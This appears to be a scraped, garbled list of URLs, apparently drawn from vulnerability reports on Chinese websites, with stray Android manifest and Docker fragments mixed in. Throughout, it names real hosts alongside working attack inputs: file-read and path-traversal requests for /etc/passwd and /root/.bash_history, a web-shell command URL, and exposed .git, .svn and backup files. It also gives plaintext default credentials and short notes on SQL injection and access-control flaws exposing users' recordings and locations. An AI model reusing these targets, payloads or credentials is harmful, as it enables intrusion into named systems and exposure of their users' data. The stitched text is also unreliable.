http://cw.syu.edu.cn:8080/kfweb/kfsf/Sf_HzQuery.aspx http://cwcx.jlsu.edu.cn/kfsf/Sf_HzQuery.aspx http://www.euse.com.cn/cases_2.html http://tms.sfdj.gov.cn/ http://study.euse.com.cn/ http://yajs.net/ http://www.lszxpx.com/ http://www.jiudianxueyuan.com/ http://elearning.chang-de.com:6088/ http://mail.hlctc.com.cn:801/ http://typecho.org http://forum.typecho.org/viewforum.php?f=19 https://www.wuxinyanglao.com/loginController.do?login http://admin.wuxinyanglao.com http://p.91zdb.com/ http://my.yili.com/RMS/SubModule/Login/LoginR.aspx http://my.yili.com/RMS.rar http://www.tsrcbank.com/ http://shop.vivo.com.cn/ http://shop.vivo.com.cn/paycenter-result_pay-XXXXXXXX-true.html http://shop.vivo.com.cn/paycenter-result_pay-150608173139659-true.html http://shop.vivo.com.cn/paycenter-result_pay-150324162591453-true.html 
http://shop.vivo.com.cn/paycenter-result_pay-150323235725856-true.html http://shop.vivo.com.cn/paycenter-result_pay-150322123902694-true.html http://shop.vivo.com.cn/paycenter-result_pay-150406213409944-true.html http://shop.vivo.com.cn/paycenter-result_pay-150406014692495-true.html http://oa.cmst.com.cn/ http://oa.cmst.com.cn/jmx-consoleing进行getshell http://116.228.99.1/ http://116.228.99.2/ http://116.228.99.25/ http://116.228.99.57/ http://116.228.99.129/ http://116.228.99.137/ http://116.228.99.145/ http://116.228.99.161/ http://116.228.99.214/ http://php.xingshulin.com/blog/php/get.php?id=65&act=get_one_article http://php.xingshulin.com/blog/php/get.php?id=65%27&act=get_one_article http://files.vivo.com.cn/.git/config http://market.douban.com/ http://yl***.yaolan.com/***/ http://www.iyoungsh.com/tickets/int_order.aspx?a=53 http://www.willtravel.cn/tickets/int_order.aspx?a=53 http://www.hangshunda.com.cn/tickets/int_order.aspx?a=53 http://flight.zhelun.com/tickets/int_order.aspx?a=53 http://www.cht-travel.com/tickets/int_order.aspx?a=53 http://book.yccas.com/tickets/int_order.aspx?a=53 http://www.qichen-air.com/tickets/int_order.aspx?a=53 http://dgdz.xzit.edu.cn/model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://210.43.24.201:8080//model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://hzhlab.hytc.edu.cn/model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://labch.cumt.edu.cn:81/model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://210.27.176.162/model/Center/OpenScience_ItemInfo.aspx?tblOpenScienceItemID=25 http://store.tdxinfo.com/ http://ship.tdxinfo.com/tops-front-purchaser-cruise/order/detail?id=YL150608000010 http://shop.vivo.com.cn/gallery-diff.html http://shop.vivo.com.cn/member-ajax_fav.html http://shop.vivo.com.cn http://www.zjmb.gov.cn/ ftp://www.zjmb.gov.cn http://www.1000plan.org/news/61?tag=%E4%BF%A1%E6%81%AF%E7%A7%91%E6%8A%80 
com.suning.mobile.epa/com.suning.mobile.paysdk.ui.CashierPrepareActivity http://61.184.240.98/ http://iwssit.suning.com http://admin.yinyuetai.com/ http://shop.admin.yinyuetai.com http://**.**.**/Manager/Login.aspx_ http://61.242.102.54:8080 http://www.hyxlib.com/MessageList.aspx?SectionId=0c634828-5a69-41c3-83dd-5e2b605ff07f http://210.45.134.251/MessageList.aspx?SectionId=a2a03a1e-8c18-40e5-97d1-7db9776c9fe6 http://lib.zisu.edu.cn/MessageList.aspx?SectionId=96931ccb-a9ca-412b-9415-5436554427b0 http://lib.shafc.edu.cn/tsg/MessageList.aspx?SectionId=17f366c5-ab9f-4e85-ac14-7720362a2e05 http://tsg.hacz.edu.cn/MessageList.aspx?SectionId=7321547b-9cb0-4b2e-a7b6-8d50ccb72f9e http://lib.nyxx.sh.cn/nxtsg/MessageList.aspx?SectionId=c5ba6f29-6213-491a-9134-9068f1c3792a http://www.hbems.com.cn/Search.asp inurl:web_programs_dotnet/ http://www.lyjyw.gov.cn/web/web_programs_dotnet/member/Default.aspx http://web.ptjy.gov.cn/web/web_programs_dotnet/member/Default.aspx http://school.mwedu.gov.cn/web/web_programs_dotnet/member/Default.aspx http://school.gledu.gov.cn/web/web_programs_dotnet/member/Default.aspx http://school.zzxcjy.com/web/web_programs_dotnet/member/Default.aspx http://school.zzlwjy.com/web/web_programs_dotnet/member/Default.aspx http://school.fjhajy.gov.cn/web/web_programs_dotnet/member/Default.aspx http://www.zzyxjy.com/web/web_programs_dotnet/member/Default.aspx http://125.71.200.170:8000/ http://218.7.239.170:81/InstCertList.aspx?ID=0100061 http://www.spjdz.com/InstCertList.aspx?ID=0100061 http://www.thszjz.com/InstCertList.aspx?ID=0100061 http://www.hyjsjd.cn/InstCertList.aspx?ID=0100061 http://www.jljszj.gov.cn/InstCertList.aspx?ID=0100061 http://eln.meizu.com http://www.zlms.org/index.html没有发现有下载源码的地方。看到有官方案例 ftp://download.dhgate.com http://124.207.169.19:80/manager/html http://aboutus.cits.cn/ http://aboutus.cits.cn:80//cits/images/1x.asp http://uac.xy189.cn/html/ http://58.53.194.85:8081/ rdp://58.53.194.85:8890 http://sms.xy189.cn/login.action 
http://sms.xy189.cn/login.action http://try.xy189.cn/showhopo.aspx?id=100862 http://try.xy189.cn/showhopo.aspx?id=100862 http://**.**.**/ http://**.**.**/ https://per.cmbc.com.cn/pweb/SignInfoQry.do https://per.cmbc.com.cn/pweb/FdHisListQry.do https://per.cmbc.com.cn/pweb/FundTrsQryPre.do http://www.365heart.com/Console/NewsManage/Admin_News_Add.asp?newsid= http://www.365heart.com/show/107497.shtml http://www.365heart.com/Console/NewsManage/Admin_News_Add.asp?newsid=107497 http://61.129.102.46/ http://www.zlmai.com/pay.php?orderid=572 https://portal.haier.com/web/reSetPassWord/reset?replyType=1&cn=000*****&tel=&email=&wwwmail=********@163.com https://portal.haier.com/web/infoVeify.jsp https://portal.haier.com/web/reSetPassWord/reset?replyType=1&cn=000*****&tel=&email=&wwwmail=********@163.com http://m.cits.cn/ http://m.cits.cn/login.html http://m.cits.cn http://125.88.112.151/auth/ http://www.tudou.com/programs/view/ri6jjwGldso/?qq-pf-to=pcqq.c2c http://e.dangdang.com/bbs/.git/ www.harbin-electric.com/gdrw/admin/news_manage/news_list.asp?p=2&type_id=1存在布尔型盲注;可获得账户口令(admin/meijing),登陆目标管理系统http://www.harbin-electric.com/gdrw/admin/login.asp,发现登陆该目标系统后,通过修改url地址,可直接访问最终后台http://www.harbin-electric.com/admin/,尽管未知终极管理后台的口令,但由于已登陆系统未设置隔离机制,所以可直接访问目标后台,进入目标后台,可随意查看用户数据信息,发布传播恶意新闻,对整个系统的安全性造成严重的安全危害; http://w.wps.cn/ http://w.wps.cn http://video.wanfangdata.com.cn/manage/index.jsp zmao.cc/myadmin/log.txt就能看管理员登录过的用户名和密码 zmao.cc/web.rar就可以下载网站的备份。里面包还有数据库备份 https://github.com/yangwanyuan/mana_backend/blob/394e1b9add13aa1d180848bf313606660b86f4ab/etc/mana_monitor.conf url:http://202.102.109.8:80/manager/html user:tomcat pass:tomcat http://www.nbems.net//down/class/index.php?myord=1 Site:http://www.4007123123.com/index.aspx http://www.4007123123.com/UserHome/MyInfo.aspx http://www.4007123123.com/UserHome/MyAddress.aspx http://www.4007123123.com/UserHome/MyAddress.aspx?id=146096 http://www.4007123123.com/UserHome/MyAddress.aspx?id=146095 
http://www.4007123123.com/UserHome/MyAddress.aspx?id=4650 http://xiangyouji.com.cn/admin http://61.183.35.213/zbgg?id= http://61.183.35.213/login http://61.183.35.213/resources/articles/2431/wooyun.jsp.jpg http://mail.tjutcm.edu.cn http://pan.baidu.com/s/1c0EWybQ http://pan.baidu.com/s/1c0EWybQ http://pan.baidu.com/s/1c0EWybQ http://admin.cmgame.com:8168/bme/customCp/copModCourseprm.action?isFlush=true&goPage=basicprm&isChange=1&usertype=cp&objectId=101957&hideTax=1&ticketValidate=NO.9085231 http://211.151.59.14 http://211.151.59.13 http://211.151.59.27 http://211.151.59.14/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://211.151.59.14/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://211.151.59.14/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://nqsms.netqin.com/ http://211.151.59.13/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://211.151.59.13/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://211.151.59.13/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://61.189.35.4:8080/ http://www.9rx.com.cn http://www.ksgt.gov.cn/mod/shop/quest/ajax.php?op=auction_buy&tid=-1 www.xinyiwater.gov.cn/SiteWeaver3.mdb http://www.chncto.com/heikejishu/10629.html http://www.xinyiwater.gov.cn/1xq17.asp http://218.28.166.70:8080/onlinetalk/index.do http://www.hazz.hrss.gov.cn:8080/cx/073.html https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&formdir=1&reason=0 https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=3 https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=4 https://webmail.ctrip.com/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=5 https://vpn.ctrip.com/prx/000/http/localhost/login http://www.xiami.com/collect/101274090?spm=a1z1s.6626001.229054137.2.Z606cM http://114.247.103.242/econline/ http://114.247.103.242:8002/app/shell.jsp?cmd=whoami 
http://**.**.** ftp://**.**.** ftp://**.**.**/FAW-VW/Faw.DDMP_WS/Web.config http://wanmei.hiall.com.cn/.git/config http://cs.kdweibo.com/space/c/user/forget-password www.kdweibo.com http://im.kdweibo.com/xtweb/web/login.jsp https://www.sncfc.com.cn http://72wan.voc.com.cn/.svn/entries http://72wan.voc.com.cn/?s=/Help/show/catid/44* http://www.grainnews.com.cn:9998/epaper/search/advresult.jsp http://219.156.123.48:8080/epaper/search/advresult.jsp http://61.153.66.148/epaper/search/advresult.jsp http://health.lsol.cc/epaper/search/advresult.jsp http://szb.stxqw.com/epaper/search/advresult.jsp http://61.166.63.106:9999/epaper/advsearch/advresult.jsp http://qyepaper.zjol.com.cn/epaper/advsearch/advresult.jsp http://www.grainnews.com.cn:9998/epaper/search/advresult.jsp http://m.tuanche.com/yzmdl?iosFlag= http://m.the9.com/.git/config http://www.baifendian.com/ http://passport.baifendian.com/handOut.action android:name="com.meituan.android.base.hybrid.HybridWebViewActivity android:launchMode="0 android:screenOrientation="1 android:configChanges="0x000000A0 android:name="android.intent.action.VIEW android:name="android.intent.category.DEFAULT android:name="android.intent.category.BROWSABLE android:scheme="imeituan android:host="www.meituan.com android:path="/hybrid/web http://search.weiqi.sports.tom.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://202.108.12.240/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/usr/local/webapps/weiqi/wqsearch.jsp http://202.108.12.240/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://202.108.12.240/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.93yin.com/index.php?r=default/photo/zpbc&id=27 http://hd.tiexue.net/ https://github.com/LyonWong/Framework-LY/blob/aea17fc85bc5667a9c7408c089d6c2b6933a658c/config/.conf/email.php http://www.imooc.com/code/3541 http://www.wanxinsoft.com/ 
http://dgdz.xzit.edu.cn/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://182.129.150.10:8001/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://hzhlab.hytc.edu.cn/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://sys.zafu.edu.cn:81/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://labch.cumt.edu.cn:81/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://sys.zafu.edu.cn:81/model/center/student/LabOpen/ApparatusOpenAuditingLook.aspx?id=1054 http://210.43.24.201:8080/model/center/student/LabOpen/ApparatusOpenAuditingLook.aspx?id=1054 http://www.dajie.com/profilefeed/list?uid=9160039&filter=microblog&ajax=1&_CSRFToken=ZAkpusAQeY_pDE2xA5CLtVF_rzcnnNDaaszR9Fxd www.angoo.net,打开页面不是官方网站,而是海康管理平台页面 http://yt.linekong.com/special/festival/2009/51/news.php?article_id=10869 android:configChanges="locale|keyboardHidden|orientation|screenSize|smallestScreenSize android:label="@string/app_name android:name="com.ganji.android.action.WebViewActivity android:screenOrientation="portrait android:name="com.ganji.android.action.VIEW_INFORMATION_MESSAGE android:name="android.intent.category.DEFAULT http://61.190.37.57:9200/adjsweb/web/admin/index/login http://61.190.37.57:9200/,管理密码也是admin/admin,可以start,stop服务; android:configChanges="locale|keyboardHidden|orientation|screenSize|smallestScreenSize android:label="@string/app_name android:name="com.ganji.android.action.WebViewActivity android:screenOrientation="portrait android:name="com.ganji.android.action.VIEW_INFORMATION_MESSAGE android:name="android.intent.category.DEFAULT http://zhibiao.hexun.com/Inventorpage/_IndexIconography_Big http://chzx.mhedu.sh.cn/bl/groupSpace/group/member_list.jsp?groupId=group05000000035 http://58.217.106.249/bl/groupSpace/group/member_list.jsp?groupId=group05000000035 http://www.hszhj.pudong-edu.sh.cn/bl/groupSpace/group/member_list.jsp?groupId=group04000000004 
http://zjyiz.zje.net.cn/bl/groupSpace/group/member_list.jsp?groupId=group07000000047 http://www.hsjy.pte.sh.cn/bl/groupSpace/group/member_list.jsp?groupId=group19000000035 http://www.zjyk2z.net/bl/groupSpace/group/member_list.jsp?groupId=group63000000003 http://www.yk2z.ykedu.net/bl/groupSpace/group/member_list.jsp?groupId=group05000000035 http://yt.linekong.com/special/exercise/article.php?article_id=10222 http://bbs.yinker.com http://zb.suning.com http://www.daling.com http://www.daling.com/index.php?_c=order&_a=orderDetail&order_id=1241609 http://manager.tv.tcl.com/ http://www.skyworth-ea.com/sysadmin/login.aspx http://www.smasmj.com/newedos/default.aspx?role=author http://www.scdwzz.com/newedos/default.aspx?role=author http://www.rjggy.com/newedos/default.aspx?role=author http://www.zlyfyzl.cn/newedos/default.aspx?role=author http://www.yqtdmgc.com/newedos/default.aspx?role=author http://webware.hp.com/slm/orangePortal/downloadFile?filename=/index.jsp http://webware.hp.com/slm/orangePortal/downloadFile?filename=/WEB-INF/web.xml https://github.com/****/doc/blob/b7e83d64e0bcbe****18947533336bd7b96c93/%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/%5B03%5D%E5%90%88%E4%BD%9C%E6%B8%A0%E9%81%93/%E4%B8%9A%E5%8A%A1%E6%8E%A5%E5%8F%A3/%5B04%5D%E5%B7%B2%E5%AF%B9%E6%8E%A5%E6%B8%A0%E9%81%93/%E5%95%86%E5%9F%8E%E5%AF%B9%E6%8E%A5/%E8%8B%8F%E5%AE%81%E6%98%93%E8%B4%AD/url.txt http://union.suning.com/aas/index/index!input.action ftp://unionfile.suning.com/ http://union.suning.com/aas/open/vistorAd.action?userId=1343832&webSiteId=0&adInfoId=2&adBookId=0&channel=11&vistURL=http://m.suning.com/&subUserEx=123 http://zb.suning.com http://218.7.239.170:81/ItemCertList.aspx?ID=0100071 http://www.spjdz.com/ItemCertList.aspx?ID=0100071 http://www.thszjz.com/ItemCertList.aspx?ID=0100071 http://www.hyjsjd.cn/ItemCertList.aspx?ID=0100071 http://www.jljszj.gov.cn/ItemCertList.aspx?ID=0100071 http://support-hk.huawei.com X9DFmSxPE_7:190618r6n L_iT0ewd:19061h66u http://bbs.qiandw.com/uc_server/ 
http://119.254.70.23/ ftp://soft.homelink.com.cn http://www.namex.cn/HomeLink,按照提示进行下单,用户名为homelink+店编码(例如homelinkA13001),初始密码是:888888 http://eoffice.homelink.com.cn http://www.namex.cn/HomeLink http://114.255.21.1/ http://upstudy.unionpay.com/login/login.init.do?&elnScreen=1920*1080elnScreen http://www.rzfwzx.gov.cn/workplate/ http://www.bdxzfw.cn/workplate/ http://www.cxxzfwzx.com/workplate/ http://wxxz.gov.cn/workplate/ http://www.hdxzwzx.com/workplate/ http://xz.njqsp.com:8001/workplate/ http://211.142.37.152:81/workplate/ http://211.142.37.152:88/workplate/ http://211.142.37.154:83/workplate/ http://211.142.37.152:83/workplate/ http://183.203.128.238:82/workplate/ http://211.142.41.114:82/workplate/ http://www.hbsxxzfwzx.gov.cn/workplate/ http://www.lzxzfwzx.com/workplate/ http://www.axxzfwzx.com/workplate/ http://gyxzfw.net/workplate/ http://60.220.253.153:81/workplate/ http://60.220.240.7/workplate/ http://211.142.37.152:85/workplate/ www.qxxzfwzx.com/workplate/ http://xz.njqsp.com:8001/workplate/ http://211.142.37.152:82/workplate/ https://**.**.**/complain/complain_list.phpsubid=0&pid=1 http://zhaopin.yili.com/school/ http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.bdxzfw.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.cxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://wxxz.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.hdxzwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:88/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.154:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://183.203.128.238:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.41.114:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 
http://www.hbsxxzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.lzxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.axxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://gyxzfw.net/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://60.220.253.153:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://60.220.240.7/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:85/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= www.qxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://huawei-digitalhome.com/newsInfo.php?nid=15 http://www.phxad.com.cn/ www.phxad.com.cn http://www.phxad.com.cn http://58.213.19.200 http://122.140.81.4:8080/Login.aspx http://u.suning.com http://u.suning.com/member/personal/announce/ajaxDetail.htm http://calec.china-airlines.com/eGroupAE/p1_checkid.asp http://211.103.153.18:8091/member/user!login.jspx http://user.lvgou.com/passport/backPassword https://legendshop.tna.com.tw/web/MZPdBrand.aspx http://yjsxt.xidian.edu.cn/pub/examinee/findOptimalPlanAction.do?activityType=1 http://web.iciba.com/wap/sms/send_msg.php http://web.iciba.com/wap/sms/config.inc.php http://web.iciba.com/wap/sms/RPC.php http://www.ab-insurance.com/newsmore.asp?newsid=3499(newsid其余连接同样存在) https://github.com/favoorr/favoorr.github.io/commits/38339dc9ca93157ccdb0510f91f2195b93045274/_posts/2015-05-27-git-more-sshkeys-more-host.md https://github.com/wttyyou/tuchong/blob/e020ae253f686afef6e68f7606ee24e21b08ceb2/tuchong/Conf/test.php http://lesafe.lenovomm.com/sss/loc?&id=xxxxx http://lesafe.lenovomm.com/sss/loc?&id=xxxxx这个链接,只要将id=后面的数字替换,就可以听到别人的录音,知道别人的位置 http://bi.inspur.com/cwbase/BIAppCenter/BIModel/BIModelDetail.aspx?ID=ff08e987-c1cb-4de8-b48a-5476cee5a0c0&BIVersion=BI6.0&DBType=0 http://yckd.s.cn/ http://115.238.110.98/jmx-console/ http://mzt.12114.org.cn/LoginAction.action 
http://cas.hysec.com/index.jsp http://bbs.cbg.cn/config/config_global.php.bak http://demo.e.ikcrm.com/customers/180 http://u.suning.com/member/personal/announce/delete.htm?ids=1653237 http://www.hvgroup.com.cn/cw.do?actions=searchList&keywords=*&a=0.11454400490038097 https://github.com/marqio/dang/blob/6f3346b027e258c3b69091178df5ff1a287e4f72/media-cms/src/main/resources/config/mail-config.properties http://m.eloancn.com/page/findpwd_new.jsp?email=null&mobile=131******35&mid=903734&siqu=0 http://223.67.133.9:81/syxdzts/gl_fl_xiu.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_fl_xiu.asp?id= http://112.4.228.169:880/gl_fl_xiu.asp?id= http://ebook.lygfls.com/gl_fl_xiu.asp?id= http://www.hssqjy.com/dzts/gl_fl_xiu.asp?id= http://www.gyxsqex.com/tushu/gl_fl_xiu.asp?id= http://www.dhtfxx.com/tushu/gl_fl_xiu.asp?id= http://223.67.133.9:81/syxdzts/gl_fl_xiu.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_fl_xiu.asp?id= http://223.67.133.9:81/syxdzts/gl_bofangadd2.asp http://lsxnmxx.js.cn:41516/tushu/gl_bofangadd2.asp http://112.4.228.169:880/gl_bofangadd2.asp http://ebook.lygfls.com/gl_bofangadd2.asp http://www.hssqjy.com/dzts/gl_bofangadd2.asp http://www.gyxsqex.com/tushu/gl_bofangadd2.asp http://www.dhtfxx.com/tushu/gl_bofangadd2.asp http://www.dhtfxx.com/tushu/gl_bofangadd2.asp http://www.zhaokao.net/mstkcx.jsp?pid=18474&id=110786 http://zoomla.cn/zoomla.cn.rar http://124.167.232.58/home.php http://223.67.133.9:81/syxdzts/down.asp?id=1 http://lsxnmxx.js.cn:41516/tushu/down.asp?id=1 http://112.4.228.169:880/down.asp?id=1 http://ebook.lygfls.com/down.asp?id=1 http://www.hssqjy.com/dzts/down.asp?id=1 http://www.gyxsqex.com/tushu/down.asp?id=1 http://www.dhtfxx.com/tushu/down.asp?id=1 http://www.dhtfxx.com/tushu/down.asp?id=1 http://www.gyxsqex.com/tushu/down.asp?id=1 http://mensao.app.yaolan.com/mensao.app.yaolan.com.rar http://qyfz.czfb.gov.cn/zfzcxmgl/employee_toIndexJsp.do http://e.lvmama.com/ebooking/eplace/allPassportList.do http://conline.suning.com/cshop_console/login.jsp 
http://yun.haodai.com/ http://www.jxlife.com.cn/online/mis/download/busProcess.do?filename=206_1390353383470.pdf http://www.jxlife.com.cn/online/mis/download/busProcess.do?filename=../../../../../../../../etc/hosts nesc.cn/nesc123456 http://www.hzrsj.gov.cn/GuestBookview.asp?ID=1071 http://www.hzrsj.gov.cn/GuestBookview.asp?ID=1071 http://vb.vlinkage.com/passport/reg http://218.16.97.169 http://218.16.97.169/register.do http://cmis.inspur.com:8080/cmis/jsp/register/tcmisuser/cmisuserlogin.jsp http://cmis.inspur.com:8080/cmis/jsp/register/tcmisregst/cmisregst_read.jsp?uName=admin http://cmis.inspur.com:8080/cmis/jsp/register/tcmisregst/cmisregst_read.jsp?uName= http://cmis.inspur.com:8080/cmis/jsp/register/tcmisregst/cmisregst_read.jsp?uName=admin123 com:8080 http://dev.gionee.com/developer/login.jsp,注册开发者账号,登陆,新建一个应用,改变应用id值可查看任意商家支付秘钥和信息。也可编辑更改。 http://www.gionee.com/ http://shop.gionee.com/login_success.shtml http://www.gionee.com/op-webmap.shtml http://bd.rong360.com/bd/login.html http://**.**.**/FrameSet/Login.aspx http://bbstest.gfan.com/.svn/entries http://zhaopin.fenqile.com/。 www.rtpnr.com https://www.itouzi.com/newuser/index/forgetPwdStep2 http://wx.tclmobile.com.cn/ http://dzzb.dfstw.com/best.asp.asp http://admin.10010.com http://admin.10010.com/userApply/init.action http://rel.lenovo.com.cn/zhaoyang/gmyx.html http://123.125.89.227:8080/ base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest shipyard-cli:latest shipyard:latest rethinkdb:latest base-release:latest base-release:latest ubuntu:14.04 letv-centos6:latest letv-centos6:latest letv-centos6:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest sdns-image:v0.1-beta-47-g75b0060 base-release:latest base-release:latest base-release:latest base-release:latest 
unixbench:latest unixbench:latest base-release:latest base-release:latest base-release:latest base-release:latest docker_index:latest redis:latest registry:0.8.1 http://cq.kdnet.net/uc_server http://dgdz.xzit.edu.cn/model/TwoGradePage/LabOpenRes.aspx?labID=243 http://182.129.150.10:8001/model/TwoGradePage/LabOpenRes.aspx?labID=243 http://sys.zafu.edu.cn:81/model/TwoGradePage/LabOpenRes.aspx?labID=243 http://labch.cumt.edu.cn:81/model/TwoGradePage/LabOpenRes.aspx?labID=243 http://hzhlab.hytc.edu.cn//model/TwoGradePage/LabOpenRes.aspx?labID=243 http://www.sh.e-chinalife.com:7002/app/newWebOfferServAction?method=policyDetail&policy_num=7106311401557824 http://www.sh.e-chinalife.com:7002/app/newWebOfferServAction?method=policyDetail&policy_num=7106311401557825 http://sop.suning.com/sel/settleApply/toSettleApplyInfo.action http://cms.baifendian.com/cms.zip http://id.8684.cn/.svn/entries http://218.7.239.170:81//PKPMBS/common/MessageManageList.aspx http://www.hyjsjd.cn//PKPMBS/common/MessageManageList.aspx http://www.thszjz.com//PKPMBS/common/MessageManageList.aspx http://www.csjszj.cn//PKPMBS/common/MessageManageList.aspx http://www.jljszj.gov.cn//PKPMBS/common/MessageManageList.aspx http://dxsb.qfnu.edu.cn//model/twogradepage/pgsearch.aspx http://59.69.101.10//model/twogradepage/pgsearch.aspx http://210.43.24.201:8080/model/twogradepage/pgsearch.aspx http://yqgx.zstu.edu.cn/model/twogradepage/pgsearch.aspx http://202.114.33.72/model/twogradepage/pgsearch.aspx http://remotebak.abchinalife.cn:7060/ui http://remotebak.abchinalife.cn:7060/ui/logon/LogonSubmit.jsp https://github.com/carl798/commons/blob/fb985bdb42da54455a88ff6773ea1423a8c5f43a/mail/src/main/resources/mail.properties http://jiaowu.sicau.edu.cn/web/web/web/down/list.asp?id=602 http://djyjw.sicau.edu.cn/web/web/web/down/list.asp?id=493 http://xxgc.sicau.edu.cn:8080/viledataCode.aspx?id= http://xb.sicau.edu.cn/CN/feedback/.traceImg?t= http://www.lib.sicau.edu.cn/HuJieXiTong/rulelist.asp?cid=1 
http://www.lib.sicau.edu.cn/HuJieXiTong/ruleshow.asp?id=5 http://cdlib.sicau.edu.cn/cdlib/new_main_3.asp?news_ID=130 http://passport.zcool.com.cn/verifyEmail.do?name=“”&appId=1006 http://www.zcool.com.cn/special/gogoup4/ http://fangkuaiashou.zcool.com.cn/ http://passport.zcool.com.cn/verifyEmail.do?name=492736139@qq.com&appId=1006 http://www.zcool.com.cn/u/1975332 http://passport.zcool.com.cn/verifyEmail.do?name=451204869@qq.com&appId=1006 http://passport.zcool.com.cn/verfy.do?name=feng_ge_80@163.com&code=17f287028bfb1f8b9b887846d05f7a70&appId=1006 https://vpn.meizu.com http://doogua.dangdang.com:80/ http://www.zh-beidou.com/sichuanyidongchelianganquanguanlixitongrukou/ http://117.172.133.2 http://117.172.133.2/cgi-bin/upload.asp?destPath=upload/database_backup/&autoUnzip=unzip_delete http://117.172.133.2 http://icsa.dbic.com.cn/bs/bsPrdController.do?method=getPrdouKindList# http://icsa.dbic.com.cn/servlet/FileLookServlet?upfileurl=/dbicapps/accsys/card/image/1270188867403.jpg http://114.112.100.64:8080/ ftp://119.145.5.227/铁塔2015/铁塔验收模板文档/铁塔平台操作文档.docx https://www.lngmxx.com/ https://60.13.3.21/ https://58.42.250.234/ https://120.195.49.238/ https://124.163.249.126/ https://www.lngmxx.com举例,首先管理员账号 https://www.lngmxx.com/cgi-bin/webapp?op=_zj_rpbo_bafq_pelt&hid_method=edit&userid=4 http://ilife.homelink.com.cn/aigou/admin.php http://campus.chinahr.com//campus/careertalk/careerinterface.ashx?cityid=&companyname=-1 http://campus.chinahr.com//campus/careertalk/careerinterface.ashx?cityid=&companyname=1&ctid=¤tindex=1&dateid=&hyid=&Op=search&optag=&orderby=ct_id&pagesize=10&ran=0.24026559432968497&schoolname=%C7%&timeid= http://campus.chinahr.com//campus/careertalk/careerinterface.ashx?cityid=&companyname=1&ctid=¤tindex=1&dateid=&hyid=&Op=search&optag=&orderby=ct_id&pagesize=10&ran=0.24026559432968497&schoolname=%C7%&timeid= http://sqlmap.org http://www.chunshuitang.com/ http://buy.chunshuitang.com/address/select/?addid=2222 
http://user.chunshuitang.com/address/edit/?addid=20000 http://proxy.tup.tsinghua.edu.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://120.132.146.200:9090/houtai/index.do http://120.132.133.245:8089/ http://www.chunshuitang.com/ https://58.42.250.234/ https://www.lngmxx.com/ https://60.13.3.21/ https://120.195.49.238/ https://124.163.249.126/ https://58.42.250.234/举例,默认账号登入 https://58.42.250.234/cgi-bin/webapp?op=_zj_orib_ilzxi_bafq_pelt&method=edit&rowid=ping http://www.sxgjj.com/Seachresult.aspx?str=a https://www.bundtrade.com/BundTrade/adm.login.forgetPassword.action http://baoliao.fanhuan.com/?shop= http://180.168.124.197/solr/ https://v.jumei.com/v1/api/login?app_id=a698e1741fe5&request_uri=https://v.jumei.com&tag=6 